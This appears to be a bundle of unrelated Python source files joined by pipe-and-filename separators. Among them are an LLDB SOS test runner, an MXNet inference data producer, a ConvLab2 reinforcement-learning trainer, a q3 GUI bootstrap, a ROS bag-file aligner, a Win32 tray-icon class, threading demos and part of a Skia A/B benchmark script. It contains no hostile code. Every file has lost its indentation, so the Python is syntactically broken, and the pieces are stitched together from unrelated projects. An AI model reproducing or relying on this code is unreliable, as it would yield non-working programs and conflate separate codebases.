result = 'Success'
else:
result = 'Please, report'
print('{:68} {:>10}'.format(suite['name'], result))
print('=' * 79)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--lldb', default='lldb')
parser.add_argument('--host', default='.')
parser.add_argument('--plugin', default='.')
parser.add_argument('--logfiledir', default='.')
parser.add_argument('--assembly', default='Test.exe')
parser.add_argument('--timeout', default=90)
parser.add_argument('--regex', default='t_cmd_')
parser.add_argument('--repeat', default=1)
parser.add_argument('unittest_args', nargs='*')
args = parser.parse_args()
lldb = args.lldb
host = args.host
plugin = args.plugin
logfiledir = args.logfiledir
assembly = args.assembly
timeout = int(args.timeout)
regex = args.regex
repeat = int(args.repeat)
print("host: %s" % host)
print("lldb: %s" % lldb)
print("lldb plugin: %s" % plugin)
print("logfiledir: %s" % logfiledir)
print("assembly: %s" % assembly)
print("timeout: %i" % timeout)
print("regex: %s" % regex)
print("repeat: %i" % repeat)
if os.name != 'posix':
print('OS not supported')
exit(1)
fail_flag = os.path.join(logfiledir, 'fail_flag')
fail_flag_lldb = os.path.join(logfiledir, 'fail_flag.lldb')
print("fail_flag: %s" % fail_flag)
print("fail_flag_lldb: %s" % fail_flag_lldb)
summary_file = os.path.join(logfiledir, 'summary')
print("summary_file: %s" % summary_file)
try:
os.unlink(summary_file)
except:
pass
sys.argv[1:] = args.unittest_args
suite = unittest.TestSuite()
all_tests = inspect.getmembers(TestSosCommands, predicate=inspect.ismethod)
for (test_name, test_func) in all_tests:
if re.match(regex, test_name):
suite.addTest(TestSosCommands(test_name))
unittest.TextTestRunner(verbosity=1).run(suite)
generate_report()
if tests_failed:
exit(1)
|
InferenceDataProducer.py
|
import numpy as np
from threading import Thread
from Queue import Queue
from PIL import Image
import os
import mxnet as mx
class InferenceDataProducer(object):
def __init__(self,
im_root,
mask_root,
flist_path,
scale_list,
rgb_mean=(128, 128, 128),
data_queue_size=100):
self.flist = None
self.im_root = im_root
self.mask_root = mask_root
self._load_flist(flist_path)
self.scale_list = scale_list
self.data_num = self.get_data_num()
self.avail_data_num = self.data_num
self.cursor = 0
self.rgb_mean = mx.nd.array(rgb_mean, dtype=np.float32, ctx=mx.cpu()).reshape((1, 1, 3))
self.flist_item_queue = Queue(maxsize=1000)
list_producer = Thread(target=self._produce_flist_item)
list_producer.daemon = True
list_producer.start()
self.data_queue = Queue(maxsize=data_queue_size)
producer = Thread(target=self._produce_data)
producer.daemon = True
producer.start()
def _produce_flist_item(self):
while True:
if self.cursor + 1 <= self.data_num:
file = self.flist[self.cursor]
self.flist_item_queue.put(file)
self.cursor += 1
else:
return
def _produce_data(self):
while True:
flist_item = self.flist_item_queue.get()
value = self._process_data(flist_item)
if value is not None:
self.data_queue.put(value)
else:
raise AssertionError("file error: %s"%flist_item[0])
def _process_data(self, item):
buf = mx.nd.array(np.frombuffer(open(item[0], 'rb').read(), dtype=np.uint8), dtype=np.uint8, ctx=mx.cpu())
orig_im = mx.image.imdecode(buf)
h, w = orig_im.shape[:2]
im_list = []
for s in self.scale_list:
tmp_im = mx.image.imresize(orig_im, int(w * s), int(h * s), interp=1)
tmp_im = tmp_im.astype(np.float32)
tmp_im -= self.rgb_mean
tmp_im = mx.nd.transpose(tmp_im, [2, 0, 1])
tmp_im = mx.nd.expand_dims(tmp_im, 0)
im_list.append(tmp_im)
if item[1] is None:
l_arr = np.zeros((h, w), dtype=np.uint8)
else:
l = Image.open(item[1])
l_arr = np.array(l, dtype=np.uint8)
return (im_list, l_arr, item[2], orig_im)
def get_data(self):
if self.avail_data_num>0:
self.avail_data_num -= 1
data = self.data_queue.get()
return data
else:
return None
def get_data_num(self):
return len(self.flist)
def _load_flist(self,
flist_path):
with open(flist_path) as f:
lines = f.readlines()
self.flist = []
for line in lines:
if len(line.rstrip()) == 0:
continue
item = self._parse_flist_item(line.rstrip())
self.flist.append(item)
self.data_num = len(self.flist)
def _parse_flist_item(self, line):
item_name = line
im_name = item_name+".jpg"
im_path = os.path.join(self.im_root, im_name)
l_path = None
if os.path.exists(os.path.join(self.mask_root, item_name+".png")):
l_path = os.path.join(self.mask_root, item_name+".png")
return (im_path, l_path, item_name)
|
multi_process.py
|
# läuft parallel
import time
import math
from multiprocessing import Process
NUM_PROCESSES = 4
def calc(num_elements):
res = 0
for i in range(num_elements):
res += math.sqrt(i)
print(res)
def main():
processes = []
for _ in range(NUM_PROCESSES):
processes.append(Process(target=calc, args=[8_000_000])) # Aufgabe übergeben
start_time = time.perf_counter()
for process in processes:
process.start()
for process in processes:
process.join() # warten auf Prozesse
end_time = time.perf_counter()
print("Took: {} s".format(end_time - start_time))
if __name__ == "__main__":
main()
|
train.py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 31 10:57:51 2019
@author: truthless
"""
import numpy as np
import torch
from torch import multiprocessing as mp
from convlab2.dialog_agent.agent import PipelineAgent
from convlab2.dialog_agent.env import Environment
from convlab2.dst.rule.multiwoz import RuleDST
from convlab2.policy.rule.multiwoz import RulePolicy
from convlab2.policy.gdpl import GDPL
from convlab2.policy.gdpl import RewardEstimator
from convlab2.policy.rlmodule import Memory, Transition
from argparse import ArgumentParser
DEVICE = torch.device("cuda" if torch.cuda.is_available() else "cpu")
try:
mp = mp.get_context('spawn')
except RuntimeError:
pass
def sampler(pid, queue, evt, env, policy, batchsz):
"""
This is a sampler function, and it will be called by multiprocess.Process to sample data from environment by multiple
processes.
:param pid: process id
:param queue: multiprocessing.Queue, to collect sampled data
:param evt: multiprocessing.Event, to keep the process alive
:param env: environment instance
:param policy: policy network, to generate action from current policy
:param batchsz: total sampled items
:return:
"""
buff = Memory()
# we need to sample batchsz of (state, action, next_state, reward, mask)
# each trajectory contains `trajectory_len` num of items, so we only need to sample
# `batchsz//trajectory_len` num of trajectory totally
# the final sampled number may be larger than batchsz.
sampled_num = 0
sampled_traj_num = 0
traj_len = 50
real_traj_len = 0
while sampled_num < batchsz:
# for each trajectory, we reset the env and get initial state
s = env.reset()
for t in range(traj_len):
# [s_dim] => [a_dim]
s_vec = torch.Tensor(policy.vector.state_vectorize(s)[0])
a = policy.predict(s)
# interact with env
next_s, _, done = env.step(a)
# a flag indicates ending or not
mask = 0 if done else 1
# get reward compared to demostrations
next_s_vec = torch.Tensor(policy.vector.state_vectorize(next_s)[0])
# save to queue
buff.push(s_vec.numpy(), policy.vector.action_vectorize(a), 0, next_s_vec.numpy(), mask)
# update per step
s = next_s
real_traj_len = t
if done:
break
# this is end of one trajectory
sampled_num += real_traj_len
sampled_traj_num += 1
# t indicates the valid trajectory length
# this is end of sampling all batchsz of items.
# when sampling is over, push all buff data into queue
queue.put([pid, buff])
evt.wait()
def sample(env, policy, batchsz, process_num):
"""
Given batchsz number of task, the batchsz will be splited equally to each processes
and when processes return, it merge all data and return
:param env:
:param policy:
:param batchsz:
:param process_num:
:return: batch
"""
# batchsz will be splitted into each process,
# final batchsz maybe larger than batchsz parameters
process_batchsz = np.ceil(batchsz / process_num).astype(np.int32)
# buffer to save all data
queue = mp.Queue()
# start processes for pid in range(1, processnum)
# if processnum = 1, this part will be ignored.
# when save tensor in Queue, the process should keep alive till Queue.get(),
# please refer to : https://discuss.pytorch.org/t/using-torch-tensor-over-multiprocessing-queue-process-fails/2847
# however still some problem on CUDA tensors on multiprocessing queue,
# please refer to : https://discuss.pytorch.org/t/cuda-tensors-on-multiprocessing-queue/28626
# so just transform tensors into numpy, then put them into queue.
evt = mp.Event()
processes = []
for i in range(process_num):
process_args = (i, queue, evt, env, policy, process_batchsz)
processes.append(mp.Process(target=sampler, args=process_args))
for p in processes:
# set the process as daemon, and it will be killed once the main process is stoped.
p.daemon = True
p.start()
# we need to get the first Memory object and then merge others Memory use its append function.
pid0, buff0 = queue.get()
for _ in range(1, process_num):
pid, buff_ = queue.get()
buff0.append(buff_) # merge current Memory into buff0
evt.set()
# now buff saves all the sampled data
buff = buff0
return buff.get_batch()
def update(env, policy, batchsz, epoch, process_num, rewarder):
# sample data asynchronously
batch = sample(env, policy, batchsz, process_num)
# data in batch is : batch.state: ([1, s_dim], [1, s_dim]...)
# batch.action: ([1, a_dim], [1, a_dim]...)
# batch.reward/ batch.mask: ([1], [1]...)
s = torch.from_numpy(np.stack(batch.state)).to(device=DEVICE)
a = torch.from_numpy(np.stack(batch.action)).to(device=DEVICE)
next_s = torch.from_numpy(np.stack(batch.next_state)).to(device=DEVICE)
mask = torch.Tensor(np.stack(batch.mask)).to(device=DEVICE)
batchsz_real = s.size(0)
policy.update(epoch, batchsz_real, s, a, next_s, mask, rewarder)
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument("--load_path", type=str, default="", help="path of model to load")
parser.add_argument("--batchsz", type=int, default=1024, help="batch size of trajactory sampling")
parser.add_argument("--epoch", type=int, default=20, help="number of epochs to train")
parser.add_argument("--process_num", type=int, default=8, help="number of processes of trajactory sampling")
args = parser.parse_args()
# simple rule DST
dst_sys = RuleDST()
policy_sys = GDPL(True)
policy_sys.load(args.load_path)
rewarder = RewardEstimator(policy_sys.vector, False)
# not use dst
dst_usr = None
# rule policy
policy_usr = RulePolicy(character='usr')
# assemble
simulator = PipelineAgent(None, None, policy_usr, None, 'user')
env = Environment(None, simulator, None, dst_sys)
for i in range(args.epoch):
update(env, policy_sys, args.batchsz, i, args.process_num, rewarder)
|
boot.py
|
#standard simulator bootstrap
#from wx.core import Sleep
import q3
import q3.config
import q3.Timer as Timer
from q3.ui.engine import qtw,qtc,qtg
import threading
import os
keys = globals().keys()
runApp = False
if False and not 'c' in keys:
c = None
class encImpl(qtc.QThread):
def __init__(self):
self._c = None
self._initialized = False
super(encImpl, self).__init__()
def run(self):
while (not self._initialized):
Timer.sleepMs(0)
pass
#exec(open("./../../editor.py").read())
#g = console.newConsoleWidget
tg = threading.Thread(target=tga.run)
#t = qtc.QThread(tg.main)
#t.daemon = True
#tg.finished.connect(app.exit)
tg.start()
c = tg._c
runApp = True
#c.registerCommand('rc',c.registerCommand)
cPath = os.path.dirname(os.path.realpath(__file__))+'/'
#cPath=dirPath+'/../' #'/src/makaronLab/q3/q3/'
class encImpl:
def __init__(self):
self._namespace = None
self._initialized = False
def run(self):
self.process(self._namespace)
def process(self, _namespace):
print('Hello world')
exec(open(cPath+"regCommands.py").read())
self._initialized = True
#exec(open("/src/makaronLab/q3/q3/bootstrap/startup.py").read())
app = q3.App(q3Impl=q3.consts.Q3_IMPL)
frm = q3.EditorFrame(app, title='makaronLab')
q3.config.consoleInstance = frm.console()
c = frm.console()
q3.config.consoleWidgetInstance = frm.consoleWidget()
cw = frm.consoleWidget()
tga = encImpl()
tga._namespace = frm.consoleNamespace()
#self._initialized = True
tg = threading.Thread(target=tga.run)
tg.start()
while (not tga._initialized):
Timer.sleepMs(0)
#frm.console().registerCommand('execF',execF,True)
fileName = cPath+"beforeShow.py"
s=c.execF(fileName)
#cw.write(repr(s.getvalue()) + '\n')
cw.write('\n===bootstrap/beforeShow.py:\n'+s + '\n')
#why not register execF as Function ?
frm.Show()
#run "afterShow" in separate thread
''' # moved to test 2
class enc2Impl:
def __init__(self):
self._namespace = None
self._initialized = False
def run(self):
fileName = cPath+"bootstrap/afterShow.py"
s=execF(fileName)
#cw.write(repr(s.getvalue()) + '\n')
cw.write('\n===bootstrap/afterShow.py:\n'+s + '\n')
self._initialized = True
qor = qtc.Qt.Orientation
tgb = enc2Impl()
tgb._namespace = frm.consoleNamespace()
th2 = threading.Thread(target=tgb.run)
th2.start()
# do not wait for this thread as it can be long ...
#while (not tgb._initialized):
# Timer.sleepMs(0)
# just keeping handle for frame in case of presenting something to user
frm._afterShowThread = th2
'''
fileName = cPath+"afterShow.py"
s=c.execF(fileName)
#cw.write(repr(s.getvalue()) + '\n')
cw.write('\n===bootstrap/afterShow.py:\n'+s + '\n')
#'''
#timer = qtc.QTimer()
#timer.timeout.connect(lambda: None)
#timer.start(100)
#app.timerr= timer
#globals()['frm0']=frm
#app.setQuitOnLastWindowClosed(False)
def except_hook(cls, exception, traceback):
sys.__excepthook__(cls, exception, traceback)
import sys
sys.excepthook = except_hook
app.MainLoop()
|
alignjoy.py
|
#!/usr/bin/env python
import os
import time
import shutil
import threading
class align():
def alinha_arquivos(self, name, images, cmdvel):
if os.path.isfile("../bag-files/joy/"+name):
diferenca_images = []
#images = [arq for arq in os.listdir("../bag-files/images")]
for img in sorted(images):
diferenca_images.append(abs(int(img[0:-5]) - int(name[0:-4])))
#print(int(img[0:-5]) - int(name[0:-4]))
if (int(img[0:-5]) - int(name[0:-4])) > 0:
break
if os.path.isfile("../bag-files/images/" + name[0:-4] + ".jpeg"):
shutil.copyfile("../bag-files/images/" + name[0:-4] + ".jpeg", "../bag-files/database_images/" + name[0:-4] + ".jpeg")
elif os.path.isfile("../bag-files/images/" + str(int(name[0:-4]) + int(sorted(diferenca_images)[0])) + ".jpeg"):
shutil.copyfile("../bag-files/images/" + str(int(name[0:-4]) + int(sorted(diferenca_images)[0])) + ".jpeg", "../bag-files/database_images/" + name[0:-4] + ".jpeg")
elif os.path.isfile("../bag-files/images/" + str(int(name[0:-4]) - int(sorted(diferenca_images)[0])) + ".jpeg"):
shutil.copyfile("../bag-files/images/" + str(int(name[0:-4]) - int(sorted(diferenca_images)[0])) + ".jpeg", "../bag-files/database_images/" + name[0:-4] + ".jpeg")
diferenca_cmdvel = []
#cmdvel = [arq for arq in os.listdir("../bag-files/cmd_vel")]
for comando in sorted(cmdvel):
diferenca_cmdvel.append(
abs(int(comando[0:-4]) - int(name[0:-4])))
if (int(comando[0:-4]) - int(name[0:-4])) > 0:
break
if os.path.isfile("../bag-files/cmd_vel/" + name[0:-4] + ".txt"):
shutil.copyfile("../bag-files/cmd_vel/" + name[0:-4] + ".txt", "../bag-files/database_cmdvel/" + name[0:-4] + ".txt")
elif os.path.isfile("../bag-files/cmd_vel/" + str(int(name[0:-4]) + int(sorted(diferenca_cmdvel)[0])) + ".txt"):
shutil.copyfile("../bag-files/cmd_vel/" + str(int(name[0:-4]) + int(sorted(diferenca_cmdvel)[0])) + ".txt", "../bag-files/database_cmdvel/" + name[0:-4] + ".txt")
elif os.path.isfile("../bag-files/cmd_vel/" + str(int(name[0:-4]) - int(sorted(diferenca_cmdvel)[0])) + ".txt"):
shutil.copyfile("../bag-files/cmd_vel/" + str(int(name[0:-4]) - int(sorted(diferenca_cmdvel)[0])) + ".txt", "../bag-files/database_cmdvel/" + name[0:-4] + ".txt")
shutil.copyfile("../bag-files/joy/" + name[0:-4] + ".txt", "../bag-files/database_joy/" + name[0:-4] + ".txt")
def alinha(self):
if os.path.isdir("../bag-files/joy"):
arquivos = [arq for arq in os.listdir("../bag-files/joy")]
images = [arq for arq in os.listdir("../bag-files/images")]
cmdvel = [arq for arq in os.listdir("../bag-files/cmd_vel")]
for name in sorted(arquivos):
#self.alinha_arquivos(name)
p = threading.Thread(target=self.alinha_arquivos(name,images,cmdvel))
p.start()
#time.sleep(0.1)
p.join()
else:
print("Pasta nao encontrada")
exit()
if __name__ == '__main__':
mydata = align()
mydata.alinha()
|
traybar.py
|
import os
from .win32_adapter import *
import threading
import uuid
class SysTrayIcon(object):
QUIT = 'QUIT'
SPECIAL_ACTIONS = [QUIT]
FIRST_ID = 1023
def __init__(self,
icon,
hover_text,
menu_options=None,
on_quit=None,
default_menu_index=None,
window_class_name=None,
left_click=None,
right_click=None):
self._icon = icon
self._hover_text = hover_text
self._on_quit = on_quit
if left_click:
self._left_click = left_click
if right_click:
self._right_click = right_click
self._set_menu_options(menu_options)
window_class_name = window_class_name or ("SysTrayIconPy-%s" % (str(uuid.uuid4())))
self._default_menu_index = (default_menu_index or 0)
self._window_class_name = convert_to_ascii(window_class_name)
self._message_dict = {RegisterWindowMessage("TaskbarCreated"): self._restart,
WM_DESTROY: self._destroy,
WM_CLOSE: self._destroy,
WM_COMMAND: self._command,
WM_USER+20: self._notify}
self._notify_id = None
self._message_loop_thread = None
self._hwnd = None
self._hicon = 0
self._hinst = None
self._window_class = None
self._menu = None
self._register_class()
def _set_menu_options(self, menu_options):
self._menu_actions_by_id = set()
menu_options = menu_options or ()
self._menu_options = self._add_ids_to_menu_options(list(menu_options))
self._menu_actions_by_id = dict(self._menu_actions_by_id)
def _add_ids_to_menu_options(self, menu_options):
self._next_action_id = SysTrayIcon.FIRST_ID
result = []
for menu_option in menu_options:
option_text, option_icon, option_action, fState = menu_option
if callable(option_action) or option_action in SysTrayIcon.SPECIAL_ACTIONS:
self._menu_actions_by_id.add((self._next_action_id, option_action))
result.append(menu_option + (self._next_action_id,))
elif non_string_iterable(option_action):
result.append((option_text,
option_icon,
self._add_ids_to_menu_options(option_action),
self._next_action_id))
else:
raise Exception('Unknown item', option_text, option_icon, option_action)
self._next_action_id += 1
return result
def WndProc(self, hwnd, msg, wparam, lparam):
hwnd = HANDLE(hwnd)
wparam = WPARAM(wparam)
lparam = LPARAM(lparam)
#print msg
if msg in self._message_dict:
self._message_dict[msg](hwnd, msg, wparam.value, lparam.value)
return DefWindowProc(hwnd, msg, wparam, lparam)
def _register_class(self):
# Register the Window class.
self._window_class = WNDCLASS()
self._hinst = self._window_class.hInstance = GetModuleHandle(None)
self._window_class.lpszClassName = self._window_class_name
self._window_class.style = CS_VREDRAW | CS_HREDRAW
self._window_class.hCursor = LoadCursor(0, IDC_ARROW)
self._window_class.hbrBackground = COLOR_WINDOW
self._window_class.lpfnWndProc = LPFN_WNDPROC(self.WndProc)
RegisterClass(ctypes.byref(self._window_class))
def _create_window(self):
style = WS_OVERLAPPED | WS_SYSMENU
self._hwnd = CreateWindowEx(0, self._window_class_name,
self._window_class_name,
style,
0,
0,
CW_USEDEFAULT,
CW_USEDEFAULT,
0,
0,
self._hinst,
None)
UpdateWindow(self._hwnd)
self._refresh_icon(recreate=True)
def _message_loop_func(self):
self._create_window()
PumpMessages()
def start(self):
if self._hwnd:
return # already started
self._message_loop_thread = threading.Thread(target=self._message_loop_func)
self._message_loop_thread.daemon = True
self._message_loop_thread.start()
def shutdown(self):
if not self._hwnd:
return # not started
PostMessage(self._hwnd, WM_CLOSE, 0, 0)
self._message_loop_thread.join()
def update(self, icon=None, hover_text=None, menu=None):
""" update icon image and/or hover text """
if icon:
self._icon = icon
if hover_text:
self._hover_text = hover_text
if menu:
self._set_menu_options(menu)
self._menu = CreatePopupMenu()
self._create_menu(self._menu, self._menu_options)
self._refresh_icon()
def _load_icon(self):
# release previous icon, if a custom one was loaded
# note: it's important *not* to release the icon if we loaded the default system icon (with
# the LoadIcon function) - this is why we assign self._hicon only if it was loaded using LoadImage
# TODO don't reload if not necessary
if self._hicon != 0:
DestroyIcon(self._hicon)
self._hicon = 0
hicon = 0
# Try and find a custom icon
if self._icon is not None and os.path.isfile(self._icon):
icon_flags = LR_LOADFROMFILE | LR_DEFAULTSIZE
icon = convert_to_ascii(self._icon)
hicon = self._hicon = LoadImage(0, icon, IMAGE_ICON, 0, 0, icon_flags)
if hicon == 0:
# Can't find icon file - using default
hicon = LoadIcon(0, IDI_APPLICATION)
return hicon
def _refresh_icon(self, recreate=False):
if self._hwnd is None:
return
hicon = self._load_icon()
if self._notify_id and not recreate:
message = NIM_MODIFY
else:
message = NIM_ADD
self._notify_id = NotifyData(self._hwnd,
0,
NIF_ICON | NIF_MESSAGE | NIF_TIP,
WM_USER+20,
hicon,
self._hover_text)
Shell_NotifyIcon(message, ctypes.byref(self._notify_id))
def _restart(self, hwnd, msg, wparam, lparam):
self._refresh_icon(recreate=True)
def _destroy(self, hwnd, msg, wparam, lparam):
if self._on_quit:
self._on_quit(self)
nid = NotifyData(self._hwnd, 0)
Shell_NotifyIcon(NIM_DELETE, ctypes.byref(nid))
PostQuitMessage(0) # Terminate the app.
# TODO * release self._menu with DestroyMenu and reset the memeber
# * release self._hicon with DestoryIcon and reset the member
# * release loaded menu icons (loaded in _load_menu_icon) with DeleteObject
# (we don't keep those objects anywhere now)
self._hwnd = None
self._notify_id = None
def _notify(self, hwnd, msg, wparam, lparam):
#print lparam
if lparam == WM_LBUTTONDBLCLK:
self._execute_menu_option(self._default_menu_index + SysTrayIcon.FIRST_ID)
elif lparam == WM_RBUTTONUP:
self._right_click()
elif lparam == WM_LBUTTONUP:
self._left_click()
return True
def _left_click(self):
pass
def _right_click(self):
self._show_menu()
def _show_menu(self):
if self._menu is None:
self._menu = CreatePopupMenu()
self._create_menu(self._menu, self._menu_options)
#SetMenuDefaultItem(self._menu, 1000, 0)
pos = POINT()
GetCursorPos(ctypes.byref(pos))
# See http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/menus_0hdi.asp
SetForegroundWindow(self._hwnd)
TrackPopupMenu(self._menu,
TPM_LEFTALIGN,
pos.x,
pos.y,
0,
self._hwnd,
None)
PostMessage(self._hwnd, WM_NULL, 0, 0)
def _create_menu(self, menu, menu_options):
for option_text, option_icon, option_action, fState, option_id in menu_options[::-1]:
if option_icon:
option_icon = self._load_menu_icon(option_icon)
if option_id in self._menu_actions_by_id:
item = PackMENUITEMINFO(text=option_text,
hbmpItem=option_icon,
wID=option_id,
fState=fState)
else:
submenu = CreatePopupMenu()
self._create_menu(submenu, option_action)
item = PackMENUITEMINFO(text=option_text,
hbmpItem=option_icon,
hSubMenu=submenu)
InsertMenuItem(menu, 0, 1, ctypes.byref(item))
def _load_menu_icon(self, icon):
icon = convert_to_ascii(icon)
# First load the icon.
ico_x = GetSystemMetrics(SM_CXSMICON)
ico_y = GetSystemMetrics(SM_CYSMICON)
hicon = LoadImage(0, icon, IMAGE_ICON, ico_x, ico_y, LR_LOADFROMFILE)
hdcBitmap = CreateCompatibleDC(None)
hdcScreen = GetDC(None)
hbm = CreateCompatibleBitmap(hdcScreen, ico_x, ico_y)
hbmOld = SelectObject(hdcBitmap, hbm)
# Fill the background.
brush = GetSysColorBrush(COLOR_MENU)
FillRect(hdcBitmap, ctypes.byref(RECT(0, 0, 16, 16)), brush)
# draw the icon
DrawIconEx(hdcBitmap, 0, 0, hicon, ico_x, ico_y, 0, 0, DI_NORMAL)
SelectObject(hdcBitmap, hbmOld)
# No need to free the brush
DeleteDC(hdcBitmap)
DestroyIcon(hicon)
return hbm
def _command(self, hwnd, msg, wparam, lparam):
id = LOWORD(wparam)
self._execute_menu_option(id)
def _execute_menu_option(self, id):
menu_action = self._menu_actions_by_id[id]
if menu_action == SysTrayIcon.QUIT:
DestroyWindow(self._hwnd)
else:
menu_action(self)
def non_string_iterable(obj):
try:
iter(obj)
except TypeError:
return False
else:
return not isinstance(obj, str)
|
mt.py
|
#!/usr/bin/python3
import time
from datetime import datetime, timedelta
from threading import Thread
class Multi:
def __init__(self):
self.stop = False
def countdown(self, n):
self.start = datetime.now()
while not self.stop and n > 0:
delta = datetime.now()-self.start
if delta > timedelta(seconds=5) :
print(datetime.now())
self.start = datetime.now()
print('T-', n)
n -= 1
time.sleep(2)
if n == 0:
print("Finished")
else:
print("Stopped")
class Infinite:
def __init__(self):
pass
def countdown(n):
while n > 0:
print('T-', n)
n -= 1
time.sleep(2)
def single():
try:
countdown(10)
except KeyboardInterrupt:
print('Stopping')
def multi():
print('Press enter to stop')
m = Multi()
t = Thread(target=m.countdown, args=(10,) )
t.start()
input()
m.stop = True
multi()
|
ab.py
|
#!/usr/bin/python
# encoding: utf-8
# Copyright 2017 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be found
# in the LICENSE file.
#
# This is an A/B test utility script used by calmbench.py
#
# For each bench, we get a distribution of min_ms measurements from nanobench.
# From that, we try to recover the 1/3 and 2/3 quantiles of the distribution.
# If range (1/3 quantile, 2/3 quantile) is completely disjoint between A and B,
# we report that as a regression.
#
# The more measurements we have for a bench, the more accurate our quantiles
# are. However, taking more measurements is time consuming. Hence we'll prune
# out benches and only take more measurements for benches whose current quantile
# ranges are disjoint.
#
# P.S. The current script is brute forcely translated from a ruby script. So it
# may be ugly...
import re
import os
import sys
import time
import json
import subprocess
import shlex
import multiprocessing
import traceback
from argparse import ArgumentParser
from multiprocessing import Process
from threading import Thread
from threading import Lock
from pdb import set_trace
HELP = """
\033[31mPlease call calmbench.py to drive this script if you're not doing so.
This script is not supposed to be used by itself. (At least, it's not easy to
use by itself. The calmbench bots may use this script directly.)
\033[0m
"""
FACTOR = 3 # lower/upper quantile factor
DIFF_T = 0.99 # different enough threshold
TERM = 10 # terminate after this no. of iterations without suspect changes
MAXTRY = 30 # max number of nanobench tries to narrow down suspects
UNITS = "ns µs ms s".split()
timesLock = Lock()
timesA = {}
timesB = {}
def parse_args():
parser = ArgumentParser(description=HELP)
parser.add_argument('outdir', type=str, help="output directory")
parser.add_argument('a', type=str, help="name of A")
parser.add_argument('b', type=str, help="name of B")
parser.add_argument('nano_a', type=str, help="path to A's nanobench binary")
parser.add_argument('nano_b', type=str, help="path to B's nanobench binary")
parser.add_argument('arg_a', type=str, help="args for A's nanobench run")
parser.add_argument('arg_b', type=str, help="args for B's nanobench run")
parser.add_argument('repeat', type=int, help="number of initial runs")
parser.add_argument('skip_b', type=str, help=("whether to skip running B"
" ('true' or 'false')"))
parser.add_argument('config', type=str, help="nanobenh config")
parser.add_argument('threads', type=int, help="number of threads to run")
parser.add_argument('noinit', type=str, help=("whether to skip running B"
" ('true' or 'false')"))
parser.add_argument('--concise', dest='concise', action="store_true",
help="If set, no verbose thread info will be printed.")
parser.set_defaults(concise=False)
# Additional args for bots
BHELP = "bot specific options"
parser.add_argument('--githash', type=str, default="", help=BHELP)
parser.add_argument('--keys', type=str, default=[], nargs='+', help=BHELP)
args = parser.parse_args()
args.skip_b = args.skip_b == "true"
args.noinit = args.noinit == "true"
if args.threads == -1:
args.threads = 1
if args.config in ["8888", "565"]: # multi-thread for CPU only
args.threads = max(1, multiprocessing.cpu_count() / 2)
return args
def append_dict_sorted_array(dict_array, key, value):
if key not in dict_array:
dict_array[key] = []
dict_array[key].append(value)
dict_array[key].sort()
def add_time(args, name, bench, t, unit):
normalized_t = t * 1000 ** UNITS.index(unit);
if name.startswith(args.a):
append_dict_sorted_array(timesA, bench, normalized_t)
else:
append_dict_sorted_array(timesB, bench, normalized_t)
def append_times_from_file(args, name, filename):
with open(filename) as f:
lines = f.readlines()
for line in lines:
items = line.split()
if len(items) > 10:
bench = items[10]
matches = re.search("([+-]?\d*.?\d+)(s|ms|µs|ns)", items[3])
if (not matches or items[9] != args.config):
continue
time_num = matches.group(1)
time_unit = matches.group(2)
add_time(args, name, bench, float(time_num), time_unit)
class ThreadWithException(Thread):
def __init__(self, target):
super(ThreadWithException, self).__init__(target = target)
self.exception = None
def run(self):
try:
self._Thread__target(*self._Thread__args, **self._Thread__kwargs)
except BaseException as e:
self.exception = e
def join(self, timeout=None):
super(ThreadWithException, self).join(timeout)
class ThreadRunner:
"""Simplest and stupidiest threaded executer."""
def __init__(self, args):
self.concise = args.concise
self.threads = []
def add(self, args, fn):
if len(self.threads) >= args.threads:
self.wait()
t = ThreadWithException(target = fn)
t.daemon = True
self.threads.append(t)
t.start()
def wait(self):
def spin():
i = 0
spinners = [". ", ".. ", "..."]
while len(self.threads) > 0:
timesLock.acquire()
sys.stderr.write(
"\r" + spinners[i % len(spinners)] +
" (%d threads running)" % len(self.threads) +
" \r" # spaces for erasing characters
)
timesLock.release()
time.sleep(0.5)
i += 1
if not self.concise:
ts = Thread(target = spin);
ts.start()
for t in self.threads:
t.join()
exceptions = []
for t in self.threads:
if t.exception:
exceptions.append(t.exception)
self.threads = []
if not self.concise:
ts.join()
if len(exceptions):
for exc in exceptions:
print exc
raise exceptions[0]
def split_arg(arg):
raw = shlex.split(arg)
result = []
for r in raw:
if '~' in r:
result.append(os.path.expanduser(r))
else:
result.append(r)
return result
def run(args, threadRunner, name, nano, arg, i):
def task():
file_i = "%s/%s.out%d" % (args.outdir, name, i)
should_run = not args.noinit and not (name == args.b and args.skip_b)
if i <= 0:
should_run = True # always run for suspects
if should_run:
if i > 0:
timesLock.acquire()
print "Init run %d for %s..." % (i, name)
timesLock.release()
subprocess.check_call(["touch", file_i])
with open(file_i, 'w') as f:
subprocess.check_call([nano] + split_arg(arg) +
["--config", args.config], stderr=f, stdout=f)
timesLock.acquire()
append_times_from_file(args, name, file_i)
timesLock.release()
threadRunner.add(args, task)
def init_run(args):
threadRunner = ThreadRunner(args)
for i in range(1, max(args.repeat, args.threads / 2) + 1):
run(args, threadRunner, args.a, args.nano_a, args.arg_a, i)
run(args, threadRunner, args.b, args.nano_b, args.arg_b, i)
threadRunner.wait()
def get_lower_upper(values):
i = max(0, (len(values) - 1) / FACTOR)
return values[i], values[-i - 1]
def different_enough(lower1, upper2):
return upper2 < DIFF_T * lower1
# TODO(liyuqian): we used this hacky criteria mainly because that I didn't have
# time to study more rigorous statistical tests. We should adopt a more rigorous
# test in the future.
def get_suspects():
suspects = []
for bench in timesA.keys():
if bench not in timesB:
continue
lowerA, upperA = get_lower_upper(timesA[bench])
lowerB, upperB = get_lower_upper(timesB[bench])
if different_enough(lowerA, upperB) or different_enough(lowerB, upperA):
suspects.append(bench)
return suspects
def process_bench_pattern(s):
if ".skp" in s: # skp bench won't match their exact names...
return "^\"" + s[0:(s.index(".skp") + 3)] + "\""
else:
return "^\"" + s + "\"$"
def suspects_arg(suspects):
patterns = map(process_bench_pattern, suspects)
return " --match " + (" ".join(patterns))
def median(array):
return array[len(array) / 2]
def regression(bench):
a = median(timesA[bench])
b = median(timesB[bench])
if (a == 0): # bad bench, just return no regression
return 1
return b / a
def percentage(x):
return (x - 1) * 100
def format_r(r):
return ('%6.2f' % percentage(r)) + "%"
def normalize_r(r):
if r > 1.0:
return r - 1.0
else:
return 1.0 - 1/r
def test():
args = parse_args()
init_run(args)
last_unchanged_iter = 0
last_suspect_number = -1
tryCnt = 0
it = 0
